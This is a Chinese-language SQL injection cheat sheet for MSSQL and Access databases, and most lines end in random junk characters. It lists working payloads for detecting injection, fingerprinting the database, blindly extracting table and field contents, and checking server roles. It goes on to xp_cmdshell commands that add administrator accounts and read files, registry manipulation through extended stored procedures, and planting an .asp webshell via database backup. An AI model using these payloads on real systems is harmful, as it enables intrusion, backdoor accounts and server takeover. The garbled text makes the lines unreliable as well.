1.判断是否有注入;and 1=1 ;and 1=2 <?IDCOt ?
2.初步判断是否是mssql ;and user>0 Pf4zjc
'"7b;%EN'
3.注入参数是字符'and [查询条件] and ''=' &D[M<7T
3YLfh`6
4.搜索时没过滤参数的'and [查询条件] and '%25'=' hY{4_ie=8
YC 4c-M
5.判断数据库系统 )! rD&l$tE
?/MkH0[G =
;and (select count(*) from sysobjects)>0 mssql d m"R0>
NvIg,@}
;and (select count(*) from msysobjects)>0 access ,8Q0AkG
QChWy`x
9*FA=E
(@*|[wN
6.猜数据库 ;and (select Count(*) from [数据库名])>0 p<dw C"z
S[9b
I&C
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 -eK0 +beQ
w{T$3F`@9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 "2C}Pr,p8
~28{BY
9.(1)猜字段的ascii值(access)
[>GblL
]aMDx>OE
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Jgr;'U$
feB ?
(2)猜字段的ascii值(mssql) 3C!|!N1Hn
mIG>`7`7N
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 um$U3'0e
<Tgubv+J
10.测试权限结构(mssql) 1&e8vVN
]!S#[Wt {k
8g{Mv#b%
Ygg+=@].@
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ;8vB7|54.
D+0il=5
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- r,IekFBs
c%,ky$'18
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- )Rbt0
J|U~W
kW
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- oq|o"n)~
\2El>>
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- r%=a :GdAg
AFsieJ
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 6@#=z
+|S)Mm8-
;and 1=(select IS_MEMBER('db_owner'));-- BR@gJ(2
|wb_im
H&*&n}vh5y
I&15[:b=-
11.添加mssql和系统的帐户 }vB{6E+h/w
W^[QEmyn
;exec master.dbo.sp_addlogin username;-- !p\
@1?
;exec master.dbo.sp_password null,username,password;-- /J-.K*xKt
&,p6lbP
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 34)l3UI~
})@xWU6!
;exec master.dbo.xp_cmdshell 'net user username password C<:wSS^@1
0# 1~'e
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- P;y!Y/$ C
^=-25%&^
;exec master.dbo.xp_cmdshell 'net user username password /add';-- lws.;abm%n
!}P^O(oY
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- @/As|)
D.7cWR`Wp
B(71I;
|uFb(kL[U
12.(1)遍历目录 l#ct;KZ
J
Z@sk2
;create table dirs(paths varchar(100), id int) Su,<idS
|,n(9Ix
;insert dirs exec master.dbo.xp_dirtree 'c:\' ^o Ds*F
4$2HO`@uN
;and (select top 1 paths from dirs)>0 T^d<vH
K\ pZ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) A9Ea}v9:
|iSwG=&
2XBHo (
+ rN#
(2)遍历目录 \C;Yn6PK0
L*Ffic
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >W/mRv&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 j1Sjw6}GCH
w"M!**bP
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4M>]0%3.D
'dQGb-<_<
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
R:
It 3@
Cd>
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 d\A7}_r*x
~Odclrs
&BKnJ{,H
U[yA`7Zs}
13.mssql中的存储过程 ~QE?GL
c2GTN "
xp_regenumvalues 注册表根键, 子键 k?3mFWc
qixnaiZ
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _ !"[Zr
buKkm$@w
xp_regread 根键,子键,键值名 A;/,</
H,/=<Th;i
;exec xp_regread rWM5&M
l'!_km0{d
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
XI ><;#
xp_regwrite 根键,子键, 值名, 值类型, 值 Bz,Xg-k+
Y>nQ<
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 4|jPr J
4rCw#mVtB
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 |l|$Q;
ow,! 7|m
xp_regdeletevalue 根键,子键,值名 Y?oeP^V'u
,Wd+&|Q
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 NSx-~)
)TNG0[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 qMO(j%N5
.UK`~17!
[e|9%[.V
{Aj=Rj@
14.mssql的backup创建webshell JGhK8E
|9m*?7
use model FhEfW7]0,
[W'2z,S`WD
create table cmd(str image); 'OhGSs|
b9Eb"
insert into cmd(str) values (''); =.`e4}u \X
W$D:mw7
backup database model to disk='c:\l.asp'; ZS&+<kGD
.q 4FGPWz
(G>g0(;D-
j->5%y
15.mssql内置函数 2R3)/bz-SV
ncR]@8
;and (select @@version)>0 获得Windows的版本号 Q`=d5Uvw
?|hYtV
;and user_name()='dbo' 判断当前系统的连接用户是不是sa [].euDrX
RbA.&=3
;and (select user_name())>0 爆当前系统的连接用户 8X\":l:
0w2<2grQ
;and (select db_name())>0 得到当前连接的数据库 H7 {kl
}mk z_P(Z
(
~>-6Nb 5
/dR:\ffz2
16.简洁的webshell a8y*Jz-E
i Hcy,PBD
use model ZoqE,ucH
6099w0fR`
create table cmd(str image); ;
jJ%<
F'@[b
insert into cmd(str) values (''); }f6_7W%5
*@ S+J$
backup database model to disk='g:\wwwtest\l.asp';